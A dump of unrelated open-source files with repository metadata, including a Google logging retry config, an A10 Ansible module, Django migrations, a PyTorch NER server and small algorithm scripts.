# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
config = {
"interfaces": {
"google.logging.v2.ConfigServiceV2": {
"retry_codes": {
"idempotent": [
"DEADLINE_EXCEEDED",
"INTERNAL",
"UNAVAILABLE"
],
"non_idempotent": [],
"idempotent2": [
"DEADLINE_EXCEEDED",
"UNAVAILABLE"
]
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 100,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 20000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 20000,
"total_timeout_millis": 600000
}
},
"methods": {
"DeleteSink": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default"
},
"UpdateSink": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default"
},
"DeleteExclusion": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default"
},
"ListBuckets": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent2",
"retry_params_name": "default"
},
"GetBucket": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent2",
"retry_params_name": "default"
},
"UpdateBucket": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
},
"ListSinks": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent2",
"retry_params_name": "default"
},
"GetSink": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent2",
"retry_params_name": "default"
},
"CreateSink": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
},
"ListExclusions": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent2",
"retry_params_name": "default"
},
"GetExclusion": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent2",
"retry_params_name": "default"
},
"CreateExclusion": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
},
"UpdateExclusion": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
},
"GetCmekSettings": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent2",
"retry_params_name": "default"
},
"UpdateCmekSettings": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
}
}
}
}
}
|
[
"gcloud@google.com"
] |
gcloud@google.com
|
8eb00965d7fe2515246764e9e28869e4defe30b5
|
35fe9e62ab96038705c3bd09147f17ca1225a84e
|
/a10_ansible/library/a10_gslb_zone_service_dns_srv_record.py
|
6af19cd9ec408f7a280cb3b28bd71ada0d1abc4f
|
[] |
no_license
|
bmeidell/a10-ansible
|
6f55fb4bcc6ab683ebe1aabf5d0d1080bf848668
|
25fdde8d83946dadf1d5b9cebd28bc49b75be94d
|
refs/heads/master
| 2020-03-19T08:40:57.863038
| 2018-03-27T18:25:40
| 2018-03-27T18:25:40
| 136,226,910
| 0
| 0
| null | 2018-06-05T19:45:36
| 2018-06-05T19:45:36
| null |
UTF-8
|
Python
| false
| false
| 6,346
|
py
|
#!/usr/bin/python
REQUIRED_NOT_SET = (False, "One of ({}) must be set.")
REQUIRED_MUTEX = (False, "Only one of ({}) can be set.")
REQUIRED_VALID = (True, "")
DOCUMENTATION = """
module: a10_dns-srv-record
description:
-
author: A10 Networks 2018
version_added: 1.8
options:
srv-name:
description:
- Specify Domain Name
port:
description:
- Specify Port (Port Number)
priority:
description:
- Specify Priority
weight:
description:
- Specify Weight, default is 10
ttl:
description:
- Specify TTL
uuid:
description:
- uuid of the object
sampling-enable:
"""
EXAMPLES = """
"""
ANSIBLE_METADATA = """
"""
# Hacky way of having access to object properties for evaluation
AVAILABLE_PROPERTIES = {"port","priority","sampling_enable","srv_name","ttl","uuid","weight",}
# our imports go at the top so we fail fast.
from a10_ansible.axapi_http import client_factory
from a10_ansible import errors as a10_ex
def get_default_argspec():
return dict(
a10_host=dict(type='str', required=True),
a10_username=dict(type='str', required=True),
a10_password=dict(type='str', required=True, no_log=True),
state=dict(type='str', default="present", choices=["present", "absent"])
)
def get_argspec():
rv = get_default_argspec()
rv.update(dict(
port=dict(
type='str' , required=True
),
priority=dict(
type='str'
),
sampling_enable=dict(
type='str'
),
srv_name=dict(
type='str' , required=True
),
ttl=dict(
type='str'
),
uuid=dict(
type='str'
),
weight=dict(
type='str'
),
))
return rv
def new_url(module):
"""Return the URL for creating a resource"""
# To create the URL, we need to take the format string and return it with no params
url_base = "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-srv-record/{srv-name}+{port}"
f_dict = {}
f_dict["srv-name"] = ""
f_dict["port"] = ""
return url_base.format(**f_dict)
def existing_url(module):
"""Return the URL for an existing resource"""
# Build the format dictionary
url_base = "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-srv-record/{srv-name}+{port}"
f_dict = {}
f_dict["srv-name"] = module.params["srv-name"]
f_dict["port"] = module.params["port"]
return url_base.format(**f_dict)
def build_envelope(title, data):
return {
title: data
}
def build_json(title, module):
rv = {}
for x in AVAILABLE_PROPERTIES:
v = module.params.get(x)
if v:
rx = x.replace("_", "-")
rv[rx] = module.params[x]
return build_envelope(title, rv)
def validate(params):
# Ensure that params contains all the keys.
requires_one_of = sorted([])
present_keys = sorted([x for x in requires_one_of if params.get(x)])
errors = []
marg = []
if not len(requires_one_of):
return REQUIRED_VALID
if len(present_keys) == 0:
rc,msg = REQUIRED_NOT_SET
marg = requires_one_of
elif requires_one_of == present_keys:
rc,msg = REQUIRED_MUTEX
marg = present_keys
else:
rc,msg = REQUIRED_VALID
if not rc:
errors.append(msg.format(", ".join(marg)))
return rc,errors
def exists(module):
try:
module.client.get(existing_url(module))
return True
except a10_ex.NotFound:
return False
def create(module, result):
payload = build_json("dns-srv-record", module)
try:
post_result = module.client.post(new_url(module), payload)
result.update(**post_result)
result["changed"] = True
except a10_ex.Exists:
result["changed"] = False
except a10_ex.ACOSException as ex:
module.fail_json(msg=ex.msg, **result)
except Exception as gex:
raise gex
return result
def delete(module, result):
try:
module.client.delete(existing_url(module))
result["changed"] = True
except a10_ex.NotFound:
result["changed"] = False
except a10_ex.ACOSException as ex:
module.fail_json(msg=ex.msg, **result)
except Exception as gex:
raise gex
return result
def update(module, result):
payload = build_json("dns-srv-record", module)
try:
post_result = module.client.put(existing_url(module), payload)
result.update(**post_result)
result["changed"] = True
except a10_ex.ACOSException as ex:
module.fail_json(msg=ex.msg, **result)
except Exception as gex:
raise gex
return result
def present(module, result):
if not exists(module):
return create(module, result)
else:
return update(module, result)
def absent(module, result):
return delete(module, result)
def run_command(module):
run_errors = []
result = dict(
changed=False,
original_message="",
message=""
)
state = module.params["state"]
a10_host = module.params["a10_host"]
a10_username = module.params["a10_username"]
a10_password = module.params["a10_password"]
# TODO(remove hardcoded port #)
a10_port = 443
a10_protocol = "https"
valid, validation_errors = validate(module.params)
map(run_errors.append, validation_errors)
if not valid:
result["messages"] = "Validation failure"
err_msg = "\n".join(run_errors)
module.fail_json(msg=err_msg, **result)
module.client = client_factory(a10_host, a10_port, a10_protocol, a10_username, a10_password)
if state == 'present':
result = present(module, result)
elif state == 'absent':
result = absent(module, result)
return result
def main():
module = AnsibleModule(argument_spec=get_argspec())
result = run_command(module)
module.exit_json(**result)
# standard ansible module imports
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
if __name__ == '__main__':
main()
|
[
"mdurrant@a10networks.com"
] |
mdurrant@a10networks.com
|
0a41178fc20f8607e3279660130613dca66b6169
|
4a22da169b96b9d8d4cf30c5ea7e167cdbd1e802
|
/cluster_uva/simulation35xu_rivanna/simulation35xu_rivanna_8.py
|
b78fb63ba51f2061a43dfc5f5f6aae48c9fbb2a9
|
[] |
no_license
|
LiYan1988/simulationsYuxin
|
543fbeaac362f71513c71ceb1d1c300cabf04173
|
5997cecb5d772194900feddd07d7c5001c39b037
|
refs/heads/master
| 2021-01-19T13:50:15.968470
| 2017-03-17T21:52:33
| 2017-03-17T21:52:33
| 82,420,737
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,033
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 25 22:06:02 2017
@author: misWin
This is a template of python files for simulation 3 and 5 with Xu's algorithem on hebbe
"""
from milp2_xu import *
np.random.seed(0)
batch_id = 8
network_cost = pd.read_csv('nsf-24nodes.csv', header=None, index_col=None)
network_cost = network_cost.as_matrix()
sn = Network(network_cost, modulation='bpsk')
demands_file = 'simulation35xu_rivanna_8.csv'
demands = pd.read_csv(demands_file)
iteration_history_tr, iteration_history_gn = \
sn.iterate(demands, random_state=0, mipstart=True, mipfocus=1,
method=-1, mipgap=0.001)
# gurobi model instances cannot be save by pickle
#models_gn = {}
#models_tr = {}
#for i in iteration_history_gn.keys():
# models_gn[i] = iteration_history_gn[i].pop('model', None)
# models_tr[i] = iteration_history_tr[i].pop('model', None)
iteration_history = (iteration_history_tr, iteration_history_gn)
output_file = 'simulation35xu_rivanna_8.pkl'
save_data(output_file, iteration_history)
|
[
"li.yan.ly414@gmail.com"
] |
li.yan.ly414@gmail.com
|
22da5ff4314cfc620cb8d225b70570619873fe70
|
efb7180c05964aee07756dbd4f9982f81559d7e3
|
/TradeBot/tradebotapp/migrations/0002_auto_20191005_1543.py
|
49018395ae8bfb3525d48159fd3e3be4939ec2eb
|
[] |
no_license
|
ShunnoSaiful/Trade-Bot
|
920ba75225d921f54530fc9f0d10a8eb9eabdaaf
|
d07489dea5fcf1d1d51a918a3127f620682107f2
|
refs/heads/master
| 2022-11-24T08:22:00.946773
| 2019-10-29T05:20:08
| 2019-10-29T05:20:08
| 218,207,062
| 0
| 0
| null | 2022-11-22T04:18:04
| 2019-10-29T04:54:41
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 673
|
py
|
# Generated by Django 2.1 on 2019-10-05 15:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('tradebotapp', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='question',
name='section',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='tradebotapp.Section'),
preserve_default=False,
),
migrations.AlterField(
model_name='question',
name='question',
field=models.CharField(max_length=500),
),
]
|
[
"sunnosaiful@gmail.com"
] |
sunnosaiful@gmail.com
|
298c589f469654840e1fabc25a5a868de853909a
|
d2304891c5757e0cdb393d95b0c3d3495f6fbf76
|
/fourier.py
|
3ae0c47f18598a85df9bd0a14022cc42226f6cb0
|
[] |
no_license
|
phisyche/Python
|
8b555e540f5aeb243434a6f3eceec3ee3835d288
|
f8897f008723821fdc8a1d9a3bdf462d2c42e49c
|
refs/heads/master
| 2023-03-15T04:49:51.586572
| 2021-03-26T13:45:08
| 2021-03-26T13:45:08
| 52,379,347
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,062
|
py
|
import scipy
import matplotlib . pyplot as plt
pi = scipy .pi
signal_length = 0.5 #[ seconds ]
sample_rate =500 # sampling rate [Hz]
dt = 1./ sample_rate # time between two samples [s]
df = 1/ signal_length # frequency between points in
#in frequency domain [Hz]
t= scipy . arange (0, signal_length ,dt) #the time vector
n_t=len(t) # length of time vector
# create signal
y= scipy .sin (2* pi *50* t)+ scipy .sin (2* pi *70* t+pi /4)
# compute fourier transform
f= scipy .fft(y)
# work out meaningful frequencies in fourier transform
freqs =df* scipy . arange (0 ,( n_t -1)/2. , dtype ='d') #d= double precision float
n_freq = len ( freqs )
# plot input data y against time
plt. subplot (2 ,1 ,1)
plt. plot (t,y, label ='input data ')
plt. xlabel ('time [s]')
plt. ylabel ('signal ')
# plot frequency spectrum
plt. subplot (2 ,1 ,2)
plt. plot (freqs ,abs(f[0: n_freq ]),
label ='abs( fourier transform )')
plt. xlabel ('frequency [Hz]')
plt. ylabel ('abs(DFT( signal )) ')
# save plot to disk
plt. savefig ('fft1 .pdf ')
plt. show () #and display plot on screen
|
[
"kwellingtonmwaura@gmail.com"
] |
kwellingtonmwaura@gmail.com
|
6d49a356fda1c916ac953c333cbc4535b0d6a8f6
|
7bb34b9837b6304ceac6ab45ce482b570526ed3c
|
/external/webkit/Tools/Scripts/webkitpy/layout_tests/port/test_files.py
|
fbbbea565812a9dfcef1d6ac1700e9fe164ef72c
|
[
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.1-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
ghsecuritylab/android_platform_sony_nicki
|
7533bca5c13d32a8d2a42696344cc10249bd2fd8
|
526381be7808e5202d7865aa10303cb5d249388a
|
refs/heads/master
| 2021-02-28T20:27:31.390188
| 2013-10-15T07:57:51
| 2013-10-15T07:57:51
| 245,730,217
| 0
| 0
|
Apache-2.0
| 2020-03-08T00:59:27
| 2020-03-08T00:59:26
| null |
UTF-8
|
Python
| false
| false
| 4,698
|
py
|
#!/usr/bin/env python
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This module is used to find all of the layout test files used by
run-webkit-tests. It exposes one public function - find() -
which takes an optional list of paths. If a list is passed in, the returned
list of test files is constrained to those found under the paths passed in,
i.e. calling find(["LayoutTests/fast"]) will only return files
under that directory."""
import time
from webkitpy.common.system import logutils
_log = logutils.get_logger(__file__)
# When collecting test cases, we include any file with these extensions.
_supported_file_extensions = set(['.html', '.shtml', '.xml', '.xhtml', '.xhtmlmp', '.pl',
'.php', '.svg'])
# When collecting test cases, skip these directories
_skipped_directories = set(['.svn', '_svn', 'resources', 'script-tests'])
def find(port, paths=None):
"""Finds the set of tests under a given list of sub-paths.
Args:
paths: a list of path expressions relative to port.layout_tests_dir()
to search. Glob patterns are ok, as are path expressions with
forward slashes on Windows. If paths is empty, we look at
everything under the layout_tests_dir().
"""
paths = paths or ['*']
filesystem = port._filesystem
return normalized_find(filesystem, normalize(filesystem, port.layout_tests_dir(), paths))
def normalize(filesystem, base_dir, paths):
return [filesystem.normpath(filesystem.join(base_dir, path)) for path in paths]
def normalized_find(filesystem, paths):
"""Finds the set of tests under the list of paths.
Args:
paths: a list of absolute path expressions to search.
Glob patterns are ok.
"""
gather_start_time = time.time()
paths_to_walk = set()
for path in paths:
# If there's an * in the name, assume it's a glob pattern.
if path.find('*') > -1:
filenames = filesystem.glob(path)
paths_to_walk.update(filenames)
else:
paths_to_walk.add(path)
# FIXME: I'm not sure there's much point in this being a set. A list would
# probably be faster.
test_files = set()
for path in paths_to_walk:
files = filesystem.files_under(path, _skipped_directories, _is_test_file)
test_files.update(set(files))
gather_time = time.time() - gather_start_time
_log.debug("Test gathering took %f seconds" % gather_time)
return test_files
def _has_supported_extension(filesystem, filename):
"""Return true if filename is one of the file extensions we want to run a
test on."""
extension = filesystem.splitext(filename)[1]
return extension in _supported_file_extensions
def is_reference_html_file(filename):
"""Return true if the filename points to a reference HTML file."""
if (filename.endswith('-expected.html') or
filename.endswith('-expected-mismatch.html')):
return True
return False
def _is_test_file(filesystem, dirname, filename):
"""Return true if the filename points to a test file."""
return (_has_supported_extension(filesystem, filename) and
not is_reference_html_file(filename))
|
[
"gahlotpercy@gmail.com"
] |
gahlotpercy@gmail.com
|
b4e837341ad2ead1653cd1863d71a44210732c3f
|
a463f5858c663199b6f6e38d9b2dc93e9a9ae730
|
/problem/2003/00_200316/3143_가장빠른문자열타이핑-1.py
|
cac1f53330c94396e5da0297c859ffa05c118f54
|
[] |
no_license
|
do-park/swexpertacademy
|
4993f79e3a73697ecdc71e0f654306466626b00b
|
7cbbb0957ce5191cb44cd35094da5b0d29783e49
|
refs/heads/master
| 2020-12-22T19:26:35.257666
| 2020-10-19T02:02:32
| 2020-10-19T02:02:32
| 236,907,286
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
for tc in range(1, int(input()) + 1):
A, B = input().split()
t = A.count(B)
print(f'#{tc} {len(A) - t * len(B) + t}')
|
[
"dohee.pa@gmail.com"
] |
dohee.pa@gmail.com
|
c22f7efdcb2f21f4d80fc3b4b564f22666cc7f70
|
ddb3fc95f44733e20312c0cbfdb37fc7fd1da5e8
|
/torch_server.py
|
bb5ab48b0490566d51b8c5ffed176c3bd852ae15
|
[] |
no_license
|
ShenDezhou/EXLNet
|
2068ffecb3bebdc705bf49d5ca50076ebd50fab2
|
e1700c2d455205e8760c68e83f43520e03e67367
|
refs/heads/master
| 2023-03-08T17:05:43.205497
| 2021-02-24T07:05:17
| 2021-02-24T07:05:17
| 330,310,719
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,577
|
py
|
import argparse
import itertools
import logging
import os
import time
from types import SimpleNamespace
import falcon
import pandas
import torch
from falcon_cors import CORS
import waitress
import numpy as np
import json
import re
from torch.utils.data import DataLoader
from data import Data
from evaluate import evaluate, handy_tool, calculate_accuracy_f1
from model import RnnForSentencePairClassification, BertYForClassification, NERNet,NERWNet
from utils import load_torch_model
MODEL_MAP = {
'bert': BertYForClassification,
'rnn': NERNet,
'rnnkv': NERWNet
}
logging.basicConfig(level=logging.INFO, format='%(asctime)-18s %(message)s')
logger = logging.getLogger()
cors_allow_all = CORS(allow_all_origins=True,
allow_origins_list=['*'],
allow_all_headers=True,
allow_all_methods=True,
allow_credentials_all_origins=True
)
parser = argparse.ArgumentParser()
parser.add_argument(
'-p', '--port', default=58081,
help='falcon server port')
parser.add_argument(
'-c', '--config_file', default='config/rnn_config.json',
help='model config file')
args = parser.parse_args()
model_config=args.config_file
def result_to_json(string, tags):
item = {"string": string, "entities": []}
entity_name = ""
entity_start = 0
idx = 0
i = -1
zipped = zip(string, tags)
listzip = list(zipped)
last = len(listzip)
for char, tag in listzip:
i += 1
if tag == 3:
item["entities"].append({"word": char, "start": idx, "end": idx+1, "type":'s'})
elif tag == 0:
entity_name += char
entity_start = idx
elif tag == 1:
if (entity_name != "") and (i == last):
entity_name += char
item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": 'bms'})
entity_name = ""
else:
entity_name += char
elif tag == 2: # or i == len(zipped)
entity_name += char
item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": 'bms'})
entity_name = ""
else:
entity_name = ""
entity_start = idx
idx += 1
return item
class TorchResource:
def __init__(self):
logger.info("...")
# 0. Load config
with open(model_config) as fin:
self.config = json.load(fin, object_hook=lambda d: SimpleNamespace(**d))
if torch.cuda.is_available():
self.device = torch.device('cuda')
else:
self.device = torch.device('cpu')
# 1. Load data
self.data = Data(vocab_file=os.path.join(self.config.model_path, 'vocab.txt'),
max_seq_len=self.config.max_seq_len,
model_type=self.config.model_type, config=self.config)
# 2. Load model
self.model = MODEL_MAP[self.config.model_type](self.config)
self.model = load_torch_model(
self.model, model_path=os.path.join(self.config.model_path, 'model.bin'))
self.model.to(self.device)
logger.info("###")
def flatten(self, ll):
return list(itertools.chain(*ll))
def cleanall(self, content):
return content.replace(" ", "", 10**10)
def split(self, content):
line = re.findall('(.*?(?:[\n ]|.$))', content)
sublines = []
for l in line:
if len(l) > self.config.max_seq_len:
ll = re.findall('(.*?(?:[。,]|.$))', l)
sublines.extend(ll)
else:
sublines.append(l)
sublines = [l for l in sublines if len(l.strip())> 0]
return sublines
def bert_classification(self, content):
logger.info('1:{}'.format( content))
lines = self.split(content)
rows = []
for line in lines:
rows.append( {'content': line})
df = pandas.DataFrame(rows)
filename = "data/{}.csv".format(time.time())
df.to_csv(filename, index=False, columns=['content'])
test_set, sc_list, label_list, row_list = self.data.load_file(filename, train=False)
# token_list = []
# for line in sc_list:
# tokens = self.data.tokenizer.convert_ids_to_tokens(line)
# token_list.append(tokens)
data_loader_test = DataLoader(
test_set, batch_size=self.config.batch_size, shuffle=False)
# Evaluate
answer_list, length_list = evaluate(self.model, data_loader_test, self.device, isTest=True)
mod_tokens_list = handy_tool(row_list, length_list)
result = [result_to_json(t, s) for t, s in zip(mod_tokens_list, answer_list)]
entities = [item['entities'] for item in result]
entities = self.flatten(entities)
return {"data": entities}
def on_get(self, req, resp):
logger.info("...")
resp.set_header('Access-Control-Allow-Origin', '*')
resp.set_header('Access-Control-Allow-Methods', '*')
resp.set_header('Access-Control-Allow-Headers', '*')
resp.set_header('Access-Control-Allow-Credentials','true')
content = req.get_param('text', True)
# clean_content =
#clean_content = self.cleanall(content)
resp.media = self.bert_classification(content)
logger.info("###")
def on_post(self, req, resp):
"""Handles POST requests"""
resp.set_header('Access-Control-Allow-Origin', '*')
resp.set_header('Access-Control-Allow-Methods', '*')
resp.set_header('Access-Control-Allow-Headers', '*')
resp.set_header('Access-Control-Allow-Credentials', 'true')
resp.set_header("Cache-Control", "no-cache")
data = req.stream.read(req.content_length)
data = data.decode('utf-8')
# regex = re.compile(r'\\(?![/u"])')
# data = regex.sub(r"\\", data)
jsondata = json.loads(data)
# clean_title = shortenlines(jsondata['1'])
# clean_content = cleanall(jsondata['2'])
content = jsondata['text']
# clean_content = self.cleanall(content)
resp.media = self.bert_classification(content)
logger.info("###")
if __name__=="__main__":
api = falcon.API(middleware=[cors_allow_all.middleware])
api.req_options.auto_parse_form_urlencoded = True
api.add_route('/z', TorchResource())
waitress.serve(api, port=args.port, threads=48, url_scheme='http')
|
[
"bangtech@sina.com"
] |
bangtech@sina.com
|
a285078b484c69bd8ed5c87ab10b6da5ede6f928
|
cf0ab8503d4d704045070deea1e2125375711e86
|
/apps/metrics/v1/urls.py
|
94ae63aec636a2d71a2111dd8c53dd21cbddec4c
|
[] |
no_license
|
faierbol/syncano-platform
|
c3c6468600115752fd9fa5e46a0ad59f75f6bc9c
|
879111874d1ef70418b4890cf970720b0a2be4d8
|
refs/heads/master
| 2023-07-20T10:13:40.066127
| 2021-02-08T15:01:13
| 2021-02-08T15:01:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
# coding=UTF8
from django.urls import path
from rest_framework.routers import SimpleRouter
from apps.metrics import views
router = SimpleRouter()
router.register('hourly', views.HourlyStatsViewSet, base_name='hour-aggregate')
router.register('daily', views.DailyStatsViewSet, base_name='day-aggregate')
urlpatterns = [
path('', views.StatsLinksView.as_view(), name='stats'),
] + router.urls
|
[
"rk@23doors.com"
] |
rk@23doors.com
|
9dce403fd0a95cf1630555d797f78315313c6029
|
c2a2e40309bb86e36ec1cd283c5aaa3149e28afd
|
/dev/_import.py
|
caad219057d7da4bd4fc66308afeedc8fa245d1a
|
[
"MIT"
] |
permissive
|
ossdev07/asn1crypto
|
5fc9f864eec3f109812050fa4ed50d1f343a6aad
|
213e4fb24f5f1a7f78c9f08862b0b8728fec1510
|
refs/heads/master
| 2020-12-03T23:33:55.056818
| 2019-12-29T06:46:19
| 2019-12-29T06:46:19
| 229,199,270
| 0
| 1
|
MIT
| 2019-12-20T05:53:29
| 2019-12-20T05:53:29
| null |
UTF-8
|
Python
| false
| false
| 3,279
|
py
|
# coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
import imp
import sys
import os
from . import build_root, package_name, package_root
if sys.version_info < (3,):
getcwd = os.getcwdu
else:
getcwd = os.getcwd
def _import_from(mod, path, mod_dir=None, allow_error=False):
"""
Imports a module from a specific path
:param mod:
A unicode string of the module name
:param path:
A unicode string to the directory containing the module
:param mod_dir:
If the sub directory of "path" is different than the "mod" name,
pass the sub directory as a unicode string
:param allow_error:
If an ImportError should be raised when the module can't be imported
:return:
None if not loaded, otherwise the module
"""
if mod_dir is None:
mod_dir = mod.replace('.', os.sep)
if not os.path.exists(path):
return None
if not os.path.exists(os.path.join(path, mod_dir)) \
and not os.path.exists(os.path.join(path, mod_dir + '.py')):
return None
if os.sep in mod_dir:
append, mod_dir = mod_dir.rsplit(os.sep, 1)
path = os.path.join(path, append)
try:
mod_info = imp.find_module(mod_dir, [path])
return imp.load_module(mod, *mod_info)
except ImportError:
if allow_error:
raise
return None
def _preload(require_oscrypto, print_info):
"""
Preloads asn1crypto and optionally oscrypto from a local source checkout,
or from a normal install
:param require_oscrypto:
A bool if oscrypto needs to be preloaded
:param print_info:
A bool if info about asn1crypto and oscrypto should be printed
"""
if print_info:
print('Working dir: ' + getcwd())
print('Python ' + sys.version.replace('\n', ''))
asn1crypto = None
oscrypto = None
if require_oscrypto:
# Some CI services don't use the package name for the dir
if package_name == 'oscrypto':
oscrypto_dir = package_root
else:
oscrypto_dir = os.path.join(build_root, 'oscrypto')
oscrypto_tests = None
if os.path.exists(oscrypto_dir):
oscrypto_tests = _import_from('oscrypto_tests', oscrypto_dir, 'tests')
if oscrypto_tests is None:
import oscrypto_tests
asn1crypto, oscrypto = oscrypto_tests.local_oscrypto()
else:
if package_name == 'asn1crypto':
asn1crypto_dir = package_root
else:
asn1crypto_dir = os.path.join(build_root, 'asn1crypto')
if os.path.exists(asn1crypto_dir):
asn1crypto = _import_from('asn1crypto', asn1crypto_dir)
if asn1crypto is None:
import asn1crypto
if print_info:
print(
'\nasn1crypto: %s, %s' % (
asn1crypto.__version__,
os.path.dirname(asn1crypto.__file__)
)
)
if require_oscrypto:
print(
'oscrypto: %s backend, %s, %s' % (
oscrypto.backend(),
oscrypto.__version__,
os.path.dirname(oscrypto.__file__)
)
)
|
[
"will@wbond.net"
] |
will@wbond.net
|
14b2409d1b96d2af04379ef25da43b732b845361
|
77bb6b9fd3efdad268a99c19da3b104a0914801b
|
/Binary Tree/binary_tree_to_doubly_link_list.py
|
2d0e72b857549cf35681bc53df47b26b164d521b
|
[] |
no_license
|
Akasurde/Algorithms
|
2dc72a9b5fd30b20aba9ddce61e763a6b086c628
|
b6b79f267d39e3f352ffb4c91c544bdbd042092e
|
refs/heads/master
| 2021-01-14T08:55:07.928438
| 2015-06-21T20:21:21
| 2015-06-21T20:21:21
| 65,351,103
| 0
| 1
| null | 2016-08-10T04:41:13
| 2016-08-10T04:41:13
| null |
UTF-8
|
Python
| false
| false
| 737
|
py
|
# -*- coding: UTF-8 -*-
# Convert a given Binary Tree to Doubly Linked List
import binary_tree
def convert_to_doubly_linked_list(root):
if not root:
return
if root.left:
left = convert_to_doubly_linked_list(root.left)
while left.right:
left = left.right
left.right = root
root.left = left
if root.right:
right = convert_to_doubly_linked_list(root.right)
while right.left:
right = right.left
root.right = right
right.left = root
return root
def print_list(root):
if not root:
return
while root.left:
root = root.left
head = root
while head:
print head.data
head = head.right
tree = binary_tree.construct_binary_tree()
root = convert_to_doubly_linked_list(tree.root)
print_list(root)
|
[
"charul.agrawal@pagalguy.com"
] |
charul.agrawal@pagalguy.com
|
ff09c2d5e520b2eb37116dfc90e2c1cffa1cad18
|
8039c88ee57447e6d3b973853aae8c3421ffa8e9
|
/backend/todoapp/migrations/0001_initial.py
|
57b9a5013f42dabf23f8ddf73d723da991e2d32b
|
[] |
no_license
|
mahidulmoon/djreact-ExpenceTracker
|
3553ebe2a141bf0a5b67a46ce6871d675c4ec098
|
196c73cc7f484d3ef423699c8527c8f4f8422e9f
|
refs/heads/master
| 2023-02-09T06:43:33.292205
| 2020-06-05T12:44:18
| 2020-06-05T12:44:18
| 269,003,222
| 2
| 0
| null | 2021-01-06T03:53:52
| 2020-06-03T06:04:32
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 726
|
py
|
# Generated by Django 3.0.6 on 2020-06-02 05:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Todoapp',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.TextField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"mahidulmoon@gmail.com"
] |
mahidulmoon@gmail.com
|
2c0ae8a4900e9a3dbe5fc23d17c814448e073a6d
|
eb0bb5267035c0222da0c072c5dcd85b46099904
|
/test/tw-1630.t
